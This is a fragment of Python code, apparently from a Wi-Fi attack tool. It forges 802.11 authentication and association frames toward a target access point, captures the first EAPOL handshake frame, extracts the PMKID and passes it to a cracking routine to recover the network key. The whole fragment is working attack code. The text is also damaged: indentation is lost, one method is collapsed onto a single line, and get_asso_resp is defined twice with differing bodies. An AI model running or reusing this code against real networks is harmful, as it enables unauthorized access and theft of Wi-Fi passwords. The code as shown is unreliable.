def asso_conn(self):
if not self.__ASSO_STATUS:
asso_catcher = threading.Thread(target=self.asso_sniffer, args=(self.iface,), name="Association Depender")
asso_catcher.daemon = True
asso_catcher.start()
_retry = 0
while not self.__ASSO_STEP:
self._randn_(4)
if self.verbose:
self.pull.up("%i Frames %s (%s) %s>%s %s (%s) %s[Association Request]%s" % \
(self._randn, self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END,\
self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.BLUE, self.pull.END))
else:
self.pull.up("%i Frames %s %s>%s %s %s[Association Request]%s" % (self._randn, self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\
self.ap.replace(':', '').upper(), self.pull.BLUE, self.pull.END))
sendp(self.asso, iface=self.iface, count=1, verbose=False)
time.sleep(2); _retry += 1
if _retry >= self.retry_limit:
self.pull.right("Maximum Limit Reached for Association Requests.")
self.pull.info("Sleeping! Would restart the process in 30 seconds. ")
time.sleep(30)
break
return self.__ASSO_STEP
def _randn_(self, _max): if self._nframes == 0: self._randn = org().randomness(_max, self._randn) else: self._randn = self._nframes return
def get_asso_resp(self, pkt):
if pkt.haslayer(Dot11AssoResp):
if pkt.getlayer(Dot11AssoResp).status == 0:
sn = pkt.getlayer(Dot11).addr2.replace(':', '')
rc = pkt.getlayer(Dot11).addr1.replace(':', '')
if rc == self.cl.replace(':', '') and sn == self.ap.replace(':', ''):
self.pull.info("1 Frames %s > %s %s[Association Response]%s" % (self.ap.replace(':', '').upper(),\
self.cl.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
if self.verbose:
self.pull.info("Association with Access Point %s[SuccessFull]%s" % (self.pull.GREEN, self.pull.END) )
self.pull.info("Waiting For EAPOL to initate...")
if pkt.haslayer(EAPOL):
sn = pkt.getlayer(Dot11).addr2.replace(':', '')
nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
fNONCE = "0000000000000000000000000000000000000000000000000000000000000000"
fMIC = "00000000000000000000000000000000"
if sn == self.ap.replace(':', '') and nonce != fNONCE and mic == fMIC:
self.__ASSO_STEP = True
self.pull.up("EAPOL %s > %s %s[1 of 4]%s" % (self.ap.replace(':', '').upper(), self.cl.replace(':', '').upper(),\
self.pull.BOLD+self.pull.GREEN, self.pull.END) )
if self.verbose:
self.pull.info("Successfull handshake initiated [%s]" % org(self.ap).org)
self.__EAPOL = pkt
raise ValueError
def dev_conn(self):
auth_catcher = threading.Thread(target=self.auth_sniffer, args=(self.iface,), name="Authentication Catcher")
auth_catcher.daemon = True
auth_catcher.start()
while not self.__AUTH_STEP:
self._randn_(3)
if self.verbose:
self.pull.up("%i Frames %s (%s) %s>%s %s (%s) %s[Open Authentication]%s" % \
(self._randn, self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END,\
self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.BLUE, self.pull.END))
else:
self.pull.up("%i Frames %s %s>%s %s %s[Open Authentication]%s" % (self._randn, self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\
self.ap.replace(':', '').upper(), self.pull.BLUE, self.pull.END))
sendp(self.auth, iface=self.iface, count=2, verbose=False)
if not self.__AUTH_STATUS:
break
time.sleep(1)
return self.__AUTH_STEP
def get_auth_resp(self, pkt):
if pkt.haslayer(RadioTap):
if pkt.haslayer(Dot11Auth):
sn = pkt.getlayer(Dot11).addr2.replace(':', '')
rc = pkt.getlayer(Dot11).addr1.replace(':', '')
if rc == self.cl.replace(':', '') and sn == self.ap.replace(':', ''):
if self.verbose:
self.pull.info("Received %s (%s) %s<%s %s (%s) %s[Open Authentication]%s" % \
(self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END, self.ap.replace(':', '').upper(),\
self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.YELLOW, self.pull.END))
self.pull.info("Authentication %s (%s) %s>%s %s (%s) %s[SuccessFull]%s" % \
(self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.GREEN, self.pull.END))
else:
self.pull.info("Received %s %s<%s %s %s[Open Authentication]%s" % (self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\
self.ap.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
self.pull.info("Authentication %s %s>%s %s %s[SuccessFull]%s" % \
(self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
self.pull.GREEN, self.pull.END))
self.__AUTH_STEP = bool(1)
raise ValueError
def get_asso_resp(self, pkt):
if pkt.haslayer(Dot11AssoResp):
if pkt.getlayer(Dot11AssoResp).status == 0:
sn = pkt.getlayer(Dot11).addr2.replace(':', '')
rc = pkt.getlayer(Dot11).addr1.replace(':', '')
if rc == self.cl.replace(':', '') and sn == self.ap.replace(
':', ''):
if self.verbose:
self.pull.info("Received %s (%s) %s<%s %s (%s) %s[Association Response]%s" % \
(self.cl.replace(':', '').upper(), self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.RED, self.pull.END, self.ap.replace(':', '').upper(),\
self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.YELLOW, self.pull.END))
else:
self.pull.info("Received %s %s<%s %s %s[Association Response]%s" % (self.cl.replace(':', '').upper(), self.pull.RED, self.pull.END,\
self.ap.replace(':', '').upper(), self.pull.YELLOW, self.pull.END))
if not self.__M_PLACED:
if self.verbose:
self.pull.info("Authentication %s (%s) %s>%s %s (%s) %s[SuccessFull]%s" % \
(self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.GREEN, self.pull.END))
self.pull.info("EAPOL %s (%s) %s>%s %s (%s) %s[Waiting...]%s" % \
(self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END, self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.PURPLE, self.pull.END))
else:
self.pull.info("Authentication %s %s>%s %s %s[SuccessFull]%s" % \
(self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
self.pull.GREEN, self.pull.END))
self.pull.info("EAPOL %s %s>%s %s %s[Waiting...]%s" % \
(self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
self.pull.PURPLE, self.pull.END))
self.__M_PLACED = bool(1)
if pkt.haslayer(EAPOL):
sn = pkt.getlayer(Dot11).addr2.replace(':', '')
nonce = binascii.hexlify(pkt.getlayer(Raw).load)[26:90]
mic = binascii.hexlify(pkt.getlayer(Raw).load)[154:186]
fNONCE = "0000000000000000000000000000000000000000000000000000000000000000"
fMIC = "00000000000000000000000000000000"
if sn == self.ap.replace(':',
'') and nonce != fNONCE and mic == fMIC:
self.__ASSO_STEP = True
if self.verbose:
self.pull.info("EAPOL %s (%s) %s>%s %s (%s) %s[Initiated]%s" % (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END , self.pull.RED, self.pull.END,\
self.cl.replace(':', '').upper(), \
self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.YELLOW, self.pull.END))
self.pull.up("EAPOL %s (%s) %s>%s %s (%s) %s[1 of 4]%s" % (self.ap.replace(':', '').upper(), self.pull.DARKCYAN+org(self.ap).org+self.pull.END,\
self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
self.pull.DARKCYAN+org(self.cl).org+self.pull.END, self.pull.GREEN, self.pull.END) )
else:
self.pull.info("EAPOL %s %s>%s %s %s[Initiated]%s" % (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(), \
self.pull.YELLOW, self.pull.END))
self.pull.up("EAPOL %s %s>%s %s %s[1 of 4]%s" % (self.ap.replace(':', '').upper(), self.pull.RED, self.pull.END, self.cl.replace(':', '').upper(),\
self.pull.BOLD+self.pull.GREEN, self.pull.END) )
self.__EAPOL = pkt
raise ValueError("EAPOL")
def crack(self, _write):
fPMKID = '00000000000000000000000000000000'
PMKID = binascii.hexlify(self.__EAPOL.getlayer(Raw).load)[202:234]
if PMKID != fPMKID and PMKID != '':
self.pull.special("Vulnerable to PMKID Attack!")
if self.verbose:
self.pull.up(
"PMKID %s (%s) [%s]" %
(self.ap.replace(':', '').upper(),
self.pull.DARKCYAN + org(self.ap).org + self.pull.END,
self.pull.RED + PMKID + self.pull.END))
else:
self.pull.up("PMKID %s [%s]" % (self.ap.replace(
':', '').upper(), self.pull.RED + PMKID + self.pull.END))
self.save(_write, PMKID)
_pmk = self.crack_the_pmk(PMKID)
return _pmk
else:
self.pull.error(
"The target AP doesn't contain PMKID field. Not Vulnerable. Try with handshake. "
)
sys.exit(0)
